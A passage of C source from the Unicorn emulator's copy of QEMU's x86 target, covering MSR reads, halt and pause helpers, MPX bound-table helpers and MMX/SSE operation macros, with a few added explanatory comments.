case MSR_SMI_COUNT: val = env->msr_smi_count; break; case MSR_MTRRphysBase(0): case MSR_MTRRphysBase(1): case MSR_MTRRphysBase(2): case MSR_MTRRphysBase(3): case MSR_MTRRphysBase(4): case MSR_MTRRphysBase(5): case MSR_MTRRphysBase(6): case MSR_MTRRphysBase(7): val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysBase(0)) / 2].base; break; case MSR_MTRRphysMask(0): case MSR_MTRRphysMask(1): case MSR_MTRRphysMask(2): case MSR_MTRRphysMask(3): case MSR_MTRRphysMask(4): case MSR_MTRRphysMask(5): case MSR_MTRRphysMask(6): case MSR_MTRRphysMask(7): val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysMask(0)) / 2].mask; break; case MSR_MTRRfix64K_00000: val = env->mtrr_fixed[0]; break; case MSR_MTRRfix16K_80000: case MSR_MTRRfix16K_A0000: val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix16K_80000 + 1]; break; case MSR_MTRRfix4K_C0000: case MSR_MTRRfix4K_C8000: case MSR_MTRRfix4K_D0000: case MSR_MTRRfix4K_D8000: case MSR_MTRRfix4K_E0000: case MSR_MTRRfix4K_E8000: case MSR_MTRRfix4K_F0000: case MSR_MTRRfix4K_F8000: val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix4K_C0000 + 3]; break; case MSR_MTRRdefType: val = env->mtrr_deftype; break; case MSR_MTRRcap: if (env->features[FEAT_1_EDX] & CPUID_MTRR) { val = MSR_MTRRcap_VCNT | 
MSR_MTRRcap_FIXRANGE_SUPPORT | MSR_MTRRcap_WC_SUPPORTED; } else { /* XXX: exception? */ val = 0; } break; case MSR_MCG_CAP: val = env->mcg_cap; break; case MSR_MCG_CTL: if (env->mcg_cap & MCG_CTL_P) { val = env->mcg_ctl; } else { val = 0; } break; case MSR_MCG_STATUS: val = env->mcg_status; break; case MSR_IA32_MISC_ENABLE: val = env->msr_ia32_misc_enable; break; case MSR_IA32_BNDCFGS: val = env->msr_bndcfgs; break; case MSR_IA32_UCODE_REV: val = x86_cpu->ucode_rev; break; default: if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + (4 * env->mcg_cap & 0xff)) { uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; val = env->mce_banks[offset]; break; } /* XXX: exception? */ val = 0; break; } env->regs[R_EAX] = (uint32_t)(val); env->regs[R_EDX] = (uint32_t)(val >> 32); } static void do_pause(X86CPU *cpu) { CPUState *cs = CPU(cpu); /* Just let another CPU run. */ cs->exception_index = EXCP_INTERRUPT; cpu_loop_exit(cs); } static void do_hlt(X86CPU *cpu) { CPUState *cs = CPU(cpu); CPUX86State *env = &cpu->env; env->hflags &= ~HF_INHIBIT_IRQ_MASK; /* needed if sti is just before */ cs->halted = 1; cs->exception_index = EXCP_HLT; cpu_loop_exit(cs); } void helper_hlt(CPUX86State *env, int next_eip_addend) { X86CPU *cpu = env_archcpu(env); cpu_svm_check_intercept_param(env, SVM_EXIT_HLT, 0, GETPC()); env->eip += next_eip_addend; do_hlt(cpu); } void helper_monitor(CPUX86State *env, target_ulong ptr) { if ((uint32_t)env->regs[R_ECX] != 0) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } /* XXX: store address? */ cpu_svm_check_intercept_param(env, SVM_EXIT_MONITOR, 0, GETPC()); } void helper_mwait(CPUX86State *env, int next_eip_addend) { CPUState *cs = env_cpu(env); X86CPU *cpu = env_archcpu(env); if ((uint32_t)env->regs[R_ECX] != 0) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } cpu_svm_check_intercept_param(env, SVM_EXIT_MWAIT, 0, GETPC()); env->eip += next_eip_addend; /* XXX: not complete but not completely erroneous */ // if (cs->cpu_index != 0 || CPU_NEXT(cs) != NULL) { // TODO if (cs->cpu_index != 0) { // do_pause(cpu); } else { do_hlt(cpu); } } void helper_pause(CPUX86State *env, int next_eip_addend) { X86CPU *cpu = env_archcpu(env); cpu_svm_check_intercept_param(env, SVM_EXIT_PAUSE, 0, GETPC()); env->eip += next_eip_addend; do_pause(cpu); } void helper_debug(CPUX86State *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_DEBUG; cpu_loop_exit(cs); } uint64_t helper_rdpkru(CPUX86State *env, uint32_t ecx) { if ((env->cr[4] & CR4_PKE_MASK) == 0) { raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } if (ecx != 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } return env->pkru; } void helper_wrpkru(CPUX86State *env, uint32_t ecx, uint64_t val) { CPUState *cs = env_cpu(env); if ((env->cr[4] & CR4_PKE_MASK) == 0) { raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } if (ecx != 0 || (val & 0xFFFFFFFF00000000ull)) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } env->pkru = val; tlb_flush(cs); } 
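/*
 * Editorial sketch (not part of the original QEMU source): helper_wrmsr and
 * helper_rdmsr above follow the hardware convention that the 64-bit MSR
 * value travels split across EDX:EAX. A minimal illustration of that
 * packing, using hypothetical helper names:
 */
#if 0 /* illustration only */
static uint64_t msr_pack(uint32_t eax, uint32_t edx)
{
    /* EAX holds bits 31..0, EDX holds bits 63..32 */
    return ((uint64_t)edx << 32) | eax;
}

static void msr_unpack(uint64_t val, uint32_t *eax, uint32_t *edx)
{
    *eax = (uint32_t)val;
    *edx = (uint32_t)(val >> 32);
}
#endif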
unicorn-2.1.1/qemu/target/i386/mpx_helper.c

/*
 * x86 MPX helpers
 *
 * Copyright (c) 2015 Red Hat, Inc.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"
#include "exec/cpu_ldst.h"
#include "exec/exec-all.h"

void helper_bndck(CPUX86State *env, uint32_t fail)
{
    if (unlikely(fail)) {
        env->bndcs_regs.sts = 1;
        raise_exception_ra(env, EXCP05_BOUND, GETPC());
    }
}

static uint64_t lookup_bte64(CPUX86State *env, uint64_t base, uintptr_t ra)
{
    uint64_t bndcsr, bde, bt;

    if ((env->hflags & HF_CPL_MASK) == 3) {
        bndcsr = env->bndcs_regs.cfgu;
    } else {
        bndcsr = env->msr_bndcfgs;
    }

    bde = (extract64(base, 20, 28) << 3) + (extract64(bndcsr, 20, 44) << 12);
    bt = cpu_ldq_data_ra(env, bde, ra);
    if ((bt & 1) == 0) {
        env->bndcs_regs.sts = bde | 2;
        raise_exception_ra(env, EXCP05_BOUND, ra);
    }

    return (extract64(base, 3, 17) << 5) + (bt & ~7);
}

static uint32_t lookup_bte32(CPUX86State *env, uint32_t base, uintptr_t ra)
{
    uint32_t bndcsr, bde, bt;

    if ((env->hflags & HF_CPL_MASK) == 3) {
        bndcsr = env->bndcs_regs.cfgu;
    } else {
        bndcsr = env->msr_bndcfgs;
    }

    bde = (extract32(base, 12, 20) << 2) + (bndcsr & TARGET_PAGE_MASK);
    bt = cpu_ldl_data_ra(env, bde, ra);
    if ((bt & 1) == 0) {
        env->bndcs_regs.sts = bde | 2;
        raise_exception_ra(env, EXCP05_BOUND, ra);
    }

    return (extract32(base, 2, 10) << 4) + (bt & ~3);
}

uint64_t helper_bndldx64(CPUX86State *env, target_ulong base, target_ulong ptr)
{
    uintptr_t ra = GETPC();
    uint64_t bte, lb, ub, pt;

    bte = lookup_bte64(env, base, ra);
    lb = cpu_ldq_data_ra(env, bte, ra);
    ub = cpu_ldq_data_ra(env, bte + 8, ra);
    pt = cpu_ldq_data_ra(env, bte + 16, ra);

    if (pt != ptr) {
        lb = ub = 0;
    }
    env->mmx_t0.MMX_Q(0) = ub;
    return lb;
}

uint64_t helper_bndldx32(CPUX86State *env, target_ulong base, target_ulong ptr)
{
    uintptr_t ra = GETPC();
    uint32_t bte, lb, ub, pt;

    bte = lookup_bte32(env, base, ra);
    lb = cpu_ldl_data_ra(env, bte, ra);
    ub = cpu_ldl_data_ra(env, bte + 4, ra);
    pt = cpu_ldl_data_ra(env, bte + 8, ra);

    if (pt != ptr) {
        lb = ub = 0;
    }
    return ((uint64_t)ub << 32) | lb;
}

void helper_bndstx64(CPUX86State *env, target_ulong base, target_ulong ptr,
                     uint64_t lb, uint64_t ub)
{
    uintptr_t ra = GETPC();
    uint64_t bte;

    bte = lookup_bte64(env, base, ra);
    cpu_stq_data_ra(env, bte, lb, ra);
    cpu_stq_data_ra(env, bte + 8, ub, ra);
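    /*
     * Editorial note (added): a 64-bit MPX bound-table entry is four
     * quadwords -- lower bound at +0, upper bound at +8, the pointer value
     * at +16 (compared against by helper_bndldx64 above), and a reserved
     * slot at +24.
     */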
    cpu_stq_data_ra(env, bte + 16, ptr, ra);
}

void helper_bndstx32(CPUX86State *env, target_ulong base, target_ulong ptr,
                     uint64_t lb, uint64_t ub)
{
    uintptr_t ra = GETPC();
    uint32_t bte;

    bte = lookup_bte32(env, base, ra);
    cpu_stl_data_ra(env, bte, lb, ra);
    cpu_stl_data_ra(env, bte + 4, ub, ra);
    cpu_stl_data_ra(env, bte + 8, ptr, ra);
}

void helper_bnd_jmp(CPUX86State *env)
{
    if (!(env->hflags2 & HF2_MPX_PR_MASK)) {
        memset(env->bnd_regs, 0, sizeof(env->bnd_regs));
        env->hflags &= ~HF_MPX_IU_MASK;
    }
}

unicorn-2.1.1/qemu/target/i386/ops_sse.h

/*
 * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support
 *
 * Copyright (c) 2005 Fabrice Bellard
 * Copyright (c) 2008 Intel Corporation <andrew.zaborowski@intel.com>
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "crypto/aes.h"

#if SHIFT == 0
#define Reg MMXReg
#define XMM_ONLY(...)
#define B(n) MMX_B(n)
#define W(n) MMX_W(n)
#define L(n) MMX_L(n)
#define Q(n) MMX_Q(n)
#define SUFFIX _mmx
#else
#define Reg ZMMReg
#define XMM_ONLY(...)
__VA_ARGS__ #define B(n) ZMM_B(n) #define W(n) ZMM_W(n) #define L(n) ZMM_L(n) #define Q(n) ZMM_Q(n) #define SUFFIX _xmm #endif void glue(helper_psrlw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 15) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->W(0) >>= shift; d->W(1) >>= shift; d->W(2) >>= shift; d->W(3) >>= shift; #if SHIFT == 1 d->W(4) >>= shift; d->W(5) >>= shift; d->W(6) >>= shift; d->W(7) >>= shift; #endif } } void glue(helper_psraw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 15) { shift = 15; } else { shift = s->B(0); } d->W(0) = (int16_t)d->W(0) >> shift; d->W(1) = (int16_t)d->W(1) >> shift; d->W(2) = (int16_t)d->W(2) >> shift; d->W(3) = (int16_t)d->W(3) >> shift; #if SHIFT == 1 d->W(4) = (int16_t)d->W(4) >> shift; d->W(5) = (int16_t)d->W(5) >> shift; d->W(6) = (int16_t)d->W(6) >> shift; d->W(7) = (int16_t)d->W(7) >> shift; #endif } void glue(helper_psllw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 15) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->W(0) <<= shift; d->W(1) <<= shift; d->W(2) <<= shift; d->W(3) <<= shift; #if SHIFT == 1 d->W(4) <<= shift; d->W(5) <<= shift; d->W(6) <<= shift; d->W(7) <<= shift; #endif } } void glue(helper_psrld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 31) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->L(0) >>= shift; d->L(1) >>= shift; #if SHIFT == 1 d->L(2) >>= shift; d->L(3) >>= shift; #endif } } void glue(helper_psrad, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 31) { shift = 31; } else { shift = s->B(0); } d->L(0) = (int32_t)d->L(0) >> shift; d->L(1) = (int32_t)d->L(1) >> shift; #if SHIFT == 1 d->L(2) = (int32_t)d->L(2) >> shift; d->L(3) = (int32_t)d->L(3) >> shift; #endif } void glue(helper_pslld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 31) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->L(0) <<= shift; d->L(1) <<= shift; #if SHIFT == 1 d->L(2) <<= shift; d->L(3) <<= shift; #endif } } void glue(helper_psrlq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 63) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->Q(0) >>= shift; #if SHIFT == 1 d->Q(1) >>= shift; #endif } } void glue(helper_psllq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 63) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->Q(0) <<= shift; #if SHIFT == 1 d->Q(1) <<= shift; #endif } } #if SHIFT == 1 void glue(helper_psrldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift, i; shift = s->L(0); if (shift > 16) { shift = 16; } for (i = 0; i < 16 - shift; i++) { d->B(i) = d->B(i + shift); } for (i = 16 - shift; i < 16; i++) { d->B(i) = 0; } } void glue(helper_pslldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift, i; shift = s->L(0); if (shift > 16) { shift = 16; } for (i = 15; i >= shift; i--) { d->B(i) = d->B(i - shift); } for (i = 0; i < shift; i++) { d->B(i) = 0; } } #endif #define SSE_HELPER_B(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->B(0) = F(d->B(0), s->B(0)); \ d->B(1) = F(d->B(1), s->B(1)); \ d->B(2) = F(d->B(2), s->B(2)); \ d->B(3) = F(d->B(3), s->B(3)); \ d->B(4) = F(d->B(4), s->B(4)); \ d->B(5) = F(d->B(5), s->B(5)); \ d->B(6) = F(d->B(6), s->B(6)); \ d->B(7) = F(d->B(7), s->B(7)); \ XMM_ONLY( \ d->B(8) = F(d->B(8), s->B(8)); \ d->B(9) = 
F(d->B(9), s->B(9)); \ d->B(10) = F(d->B(10), s->B(10)); \ d->B(11) = F(d->B(11), s->B(11)); \ d->B(12) = F(d->B(12), s->B(12)); \ d->B(13) = F(d->B(13), s->B(13)); \ d->B(14) = F(d->B(14), s->B(14)); \ d->B(15) = F(d->B(15), s->B(15)); \ ) \ } #define SSE_HELPER_W(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->W(0) = F(d->W(0), s->W(0)); \ d->W(1) = F(d->W(1), s->W(1)); \ d->W(2) = F(d->W(2), s->W(2)); \ d->W(3) = F(d->W(3), s->W(3)); \ XMM_ONLY( \ d->W(4) = F(d->W(4), s->W(4)); \ d->W(5) = F(d->W(5), s->W(5)); \ d->W(6) = F(d->W(6), s->W(6)); \ d->W(7) = F(d->W(7), s->W(7)); \ ) \ } #define SSE_HELPER_L(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->L(0) = F(d->L(0), s->L(0)); \ d->L(1) = F(d->L(1), s->L(1)); \ XMM_ONLY( \ d->L(2) = F(d->L(2), s->L(2)); \ d->L(3) = F(d->L(3), s->L(3)); \ ) \ } #define SSE_HELPER_Q(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->Q(0) = F(d->Q(0), s->Q(0)); \ XMM_ONLY( \ d->Q(1) = F(d->Q(1), s->Q(1)); \ ) \ } #if SHIFT == 0 static inline int satub(int x) { if (x < 0) { return 0; } else if (x > 255) { return 255; } else { return x; } } static inline int satuw(int x) { if (x < 0) { return 0; } else if (x > 65535) { return 65535; } else { return x; } } static inline int satsb(int x) { if (x < -128) { return -128; } else if (x > 127) { return 127; } else { return x; } } static inline int satsw(int x) { if (x < -32768) { return -32768; } else if (x > 32767) { return 32767; } else { return x; } } #define FADD(a, b) ((a) + (b)) #define FADDUB(a, b) satub((a) + (b)) #define FADDUW(a, b) satuw((a) + (b)) #define FADDSB(a, b) satsb((int8_t)(a) + (int8_t)(b)) #define FADDSW(a, b) satsw((int16_t)(a) + (int16_t)(b)) #define FSUB(a, b) ((a) - (b)) #define FSUBUB(a, b) satub((a) - (b)) #define FSUBUW(a, b) satuw((a) - (b)) #define FSUBSB(a, b) satsb((int8_t)(a) - (int8_t)(b)) #define FSUBSW(a, b) satsw((int16_t)(a) - (int16_t)(b)) #define FMINUB(a, b) ((a) < (b)) ? (a) : (b) #define FMINSW(a, b) ((int16_t)(a) < (int16_t)(b)) ? (a) : (b) #define FMAXUB(a, b) ((a) > (b)) ? (a) : (b) #define FMAXSW(a, b) ((int16_t)(a) > (int16_t)(b)) ? (a) : (b) #define FAND(a, b) ((a) & (b)) #define FANDN(a, b) ((~(a)) & (b)) #define FOR(a, b) ((a) | (b)) #define FXOR(a, b) ((a) ^ (b)) #define FCMPGTB(a, b) ((int8_t)(a) > (int8_t)(b) ? -1 : 0) #define FCMPGTW(a, b) ((int16_t)(a) > (int16_t)(b) ? -1 : 0) #define FCMPGTL(a, b) ((int32_t)(a) > (int32_t)(b) ? -1 : 0) #define FCMPEQ(a, b) ((a) == (b) ? 
-1 : 0) #define FMULLW(a, b) ((a) * (b)) #define FMULHRW(a, b) (((int16_t)(a) * (int16_t)(b) + 0x8000) >> 16) #define FMULHUW(a, b) ((a) * (b) >> 16) #define FMULHW(a, b) ((int16_t)(a) * (int16_t)(b) >> 16) #define FAVG(a, b) (((a) + (b) + 1) >> 1) #endif SSE_HELPER_B(helper_paddb, FADD) SSE_HELPER_W(helper_paddw, FADD) SSE_HELPER_L(helper_paddl, FADD) SSE_HELPER_Q(helper_paddq, FADD) SSE_HELPER_B(helper_psubb, FSUB) SSE_HELPER_W(helper_psubw, FSUB) SSE_HELPER_L(helper_psubl, FSUB) SSE_HELPER_Q(helper_psubq, FSUB) SSE_HELPER_B(helper_paddusb, FADDUB) SSE_HELPER_B(helper_paddsb, FADDSB) SSE_HELPER_B(helper_psubusb, FSUBUB) SSE_HELPER_B(helper_psubsb, FSUBSB) SSE_HELPER_W(helper_paddusw, FADDUW) SSE_HELPER_W(helper_paddsw, FADDSW) SSE_HELPER_W(helper_psubusw, FSUBUW) SSE_HELPER_W(helper_psubsw, FSUBSW) SSE_HELPER_B(helper_pminub, FMINUB) SSE_HELPER_B(helper_pmaxub, FMAXUB) SSE_HELPER_W(helper_pminsw, FMINSW) SSE_HELPER_W(helper_pmaxsw, FMAXSW) SSE_HELPER_Q(helper_pand, FAND) SSE_HELPER_Q(helper_pandn, FANDN) SSE_HELPER_Q(helper_por, FOR) SSE_HELPER_Q(helper_pxor, FXOR) SSE_HELPER_B(helper_pcmpgtb, FCMPGTB) SSE_HELPER_W(helper_pcmpgtw, FCMPGTW) SSE_HELPER_L(helper_pcmpgtl, FCMPGTL) SSE_HELPER_B(helper_pcmpeqb, FCMPEQ) SSE_HELPER_W(helper_pcmpeqw, FCMPEQ) SSE_HELPER_L(helper_pcmpeql, FCMPEQ) SSE_HELPER_W(helper_pmullw, FMULLW) #if SHIFT == 0 SSE_HELPER_W(helper_pmulhrw, FMULHRW) #endif SSE_HELPER_W(helper_pmulhuw, FMULHUW) SSE_HELPER_W(helper_pmulhw, FMULHW) SSE_HELPER_B(helper_pavgb, FAVG) SSE_HELPER_W(helper_pavgw, FAVG) void glue(helper_pmuludq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->Q(0) = (uint64_t)s->L(0) * (uint64_t)d->L(0); #if SHIFT == 1 d->Q(1) = (uint64_t)s->L(2) * (uint64_t)d->L(2); #endif } void glue(helper_pmaddwd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; for (i = 0; i < (2 << SHIFT); i++) { d->L(i) = (int16_t)s->W(2 * i) * (int16_t)d->W(2 * i) + (int16_t)s->W(2 * i + 1) * (int16_t)d->W(2 * i + 1); } } #if SHIFT == 0 static inline int abs1(int a) { if (a < 0) { return -a; } else { return a; } } #endif void glue(helper_psadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { unsigned int val; val = 0; val += abs1(d->B(0) - s->B(0)); val += abs1(d->B(1) - s->B(1)); val += abs1(d->B(2) - s->B(2)); val += abs1(d->B(3) - s->B(3)); val += abs1(d->B(4) - s->B(4)); val += abs1(d->B(5) - s->B(5)); val += abs1(d->B(6) - s->B(6)); val += abs1(d->B(7) - s->B(7)); d->Q(0) = val; #if SHIFT == 1 val = 0; val += abs1(d->B(8) - s->B(8)); val += abs1(d->B(9) - s->B(9)); val += abs1(d->B(10) - s->B(10)); val += abs1(d->B(11) - s->B(11)); val += abs1(d->B(12) - s->B(12)); val += abs1(d->B(13) - s->B(13)); val += abs1(d->B(14) - s->B(14)); val += abs1(d->B(15) - s->B(15)); d->Q(1) = val; #endif } void glue(helper_maskmov, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, target_ulong a0) { int i; for (i = 0; i < (8 << SHIFT); i++) { if (s->B(i) & 0x80) { cpu_stb_data_ra(env, a0 + i, d->B(i), GETPC()); } } } void glue(helper_movl_mm_T0, SUFFIX)(Reg *d, uint32_t val) { d->L(0) = val; d->L(1) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } #ifdef TARGET_X86_64 void glue(helper_movq_mm_T0, SUFFIX)(Reg *d, uint64_t val) { d->Q(0) = val; #if SHIFT == 1 d->Q(1) = 0; #endif } #endif #if SHIFT == 0 void glue(helper_pshufw, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.W(0) = s->W(order & 3); r.W(1) = s->W((order >> 2) & 3); r.W(2) = s->W((order >> 4) & 3); r.W(3) = s->W((order >> 6) & 3); *d = r; } #else void helper_shufps(Reg *d, Reg *s, int order) { Reg r; r.L(0) = d->L(order & 3); r.L(1) = d->L((order >> 2) 
& 3); r.L(2) = s->L((order >> 4) & 3); r.L(3) = s->L((order >> 6) & 3); *d = r; } void helper_shufpd(Reg *d, Reg *s, int order) { Reg r; r.Q(0) = d->Q(order & 1); r.Q(1) = s->Q((order >> 1) & 1); *d = r; } void glue(helper_pshufd, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.L(0) = s->L(order & 3); r.L(1) = s->L((order >> 2) & 3); r.L(2) = s->L((order >> 4) & 3); r.L(3) = s->L((order >> 6) & 3); *d = r; } void glue(helper_pshuflw, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.W(0) = s->W(order & 3); r.W(1) = s->W((order >> 2) & 3); r.W(2) = s->W((order >> 4) & 3); r.W(3) = s->W((order >> 6) & 3); r.Q(1) = s->Q(1); *d = r; } void glue(helper_pshufhw, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.Q(0) = s->Q(0); r.W(4) = s->W(4 + (order & 3)); r.W(5) = s->W(4 + ((order >> 2) & 3)); r.W(6) = s->W(4 + ((order >> 4) & 3)); r.W(7) = s->W(4 + ((order >> 6) & 3)); *d = r; } #endif #if SHIFT == 1 /* FPU ops */ /* XXX: not accurate */ #define SSE_HELPER_S(name, F) \ void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_S(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ d->ZMM_S(1) = F(32, d->ZMM_S(1), s->ZMM_S(1)); \ d->ZMM_S(2) = F(32, d->ZMM_S(2), s->ZMM_S(2)); \ d->ZMM_S(3) = F(32, d->ZMM_S(3), s->ZMM_S(3)); \ } \ \ void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_S(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ } \ \ void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_D(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ d->ZMM_D(1) = F(64, d->ZMM_D(1), s->ZMM_D(1)); \ } \ \ void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_D(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ } #define FPU_ADD(size, a, b) float ## size ## _add(a, b, &env->sse_status) #define FPU_SUB(size, a, b) float ## size ## _sub(a, b, &env->sse_status) #define FPU_MUL(size, a, b) float ## size ## _mul(a, b, &env->sse_status) #define FPU_DIV(size, a, b) float ## size ## _div(a, b, &env->sse_status) #define FPU_SQRT(size, a, b) float ## size ## _sqrt(b, &env->sse_status) /* Note that the choice of comparison op here is important to get the * special cases right: for min and max Intel specifies that (-0,0), * (NaN, anything) and (anything, NaN) return the second argument. */ #define FPU_MIN(size, a, b) \ (float ## size ## _lt(a, b, &env->sse_status) ? (a) : (b)) #define FPU_MAX(size, a, b) \ (float ## size ## _lt(b, a, &env->sse_status) ? 
(a) : (b)) SSE_HELPER_S(add, FPU_ADD) SSE_HELPER_S(sub, FPU_SUB) SSE_HELPER_S(mul, FPU_MUL) SSE_HELPER_S(div, FPU_DIV) SSE_HELPER_S(min, FPU_MIN) SSE_HELPER_S(max, FPU_MAX) SSE_HELPER_S(sqrt, FPU_SQRT) /* float to float conversions */ void helper_cvtps2pd(CPUX86State *env, Reg *d, Reg *s) { float32 s0, s1; s0 = s->ZMM_S(0); s1 = s->ZMM_S(1); d->ZMM_D(0) = float32_to_float64(s0, &env->sse_status); d->ZMM_D(1) = float32_to_float64(s1, &env->sse_status); } void helper_cvtpd2ps(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_S(0) = float64_to_float32(s->ZMM_D(0), &env->sse_status); d->ZMM_S(1) = float64_to_float32(s->ZMM_D(1), &env->sse_status); d->Q(1) = 0; } void helper_cvtss2sd(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_D(0) = float32_to_float64(s->ZMM_S(0), &env->sse_status); } void helper_cvtsd2ss(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_S(0) = float64_to_float32(s->ZMM_D(0), &env->sse_status); } /* integer to float */ void helper_cvtdq2ps(CPUX86State *env, Reg *d, Reg *s) { d->ZMM_S(0) = int32_to_float32(s->ZMM_L(0), &env->sse_status); d->ZMM_S(1) = int32_to_float32(s->ZMM_L(1), &env->sse_status); d->ZMM_S(2) = int32_to_float32(s->ZMM_L(2), &env->sse_status); d->ZMM_S(3) = int32_to_float32(s->ZMM_L(3), &env->sse_status); } void helper_cvtdq2pd(CPUX86State *env, Reg *d, Reg *s) { int32_t l0, l1; l0 = (int32_t)s->ZMM_L(0); l1 = (int32_t)s->ZMM_L(1); d->ZMM_D(0) = int32_to_float64(l0, &env->sse_status); d->ZMM_D(1) = int32_to_float64(l1, &env->sse_status); } void helper_cvtpi2ps(CPUX86State *env, ZMMReg *d, MMXReg *s) { d->ZMM_S(0) = int32_to_float32(s->MMX_L(0), &env->sse_status); d->ZMM_S(1) = int32_to_float32(s->MMX_L(1), &env->sse_status); } void helper_cvtpi2pd(CPUX86State *env, ZMMReg *d, MMXReg *s) { d->ZMM_D(0) = int32_to_float64(s->MMX_L(0), &env->sse_status); d->ZMM_D(1) = int32_to_float64(s->MMX_L(1), &env->sse_status); } void helper_cvtsi2ss(CPUX86State *env, ZMMReg *d, uint32_t val) { d->ZMM_S(0) = int32_to_float32(val, &env->sse_status); } void helper_cvtsi2sd(CPUX86State *env, ZMMReg *d, uint32_t val) { d->ZMM_D(0) = int32_to_float64(val, &env->sse_status); } #ifdef TARGET_X86_64 void helper_cvtsq2ss(CPUX86State *env, ZMMReg *d, uint64_t val) { d->ZMM_S(0) = int64_to_float32(val, &env->sse_status); } void helper_cvtsq2sd(CPUX86State *env, ZMMReg *d, uint64_t val) { d->ZMM_D(0) = int64_to_float64(val, &env->sse_status); } #endif /* float to integer */ /* * x86 mandates that we return the indefinite integer value for the result * of any float-to-integer conversion that raises the 'invalid' exception. * Wrap the softfloat functions to get this behaviour. 
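 * (Editorial note: the "indefinite integer" is the most negative value of
 * the destination type -- 0x80000000 for 32-bit and 0x8000000000000000 for
 * 64-bit results -- which is why the wrappers below pass INT32_MIN and
 * INT64_MIN as the INDEFVALUE argument.)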
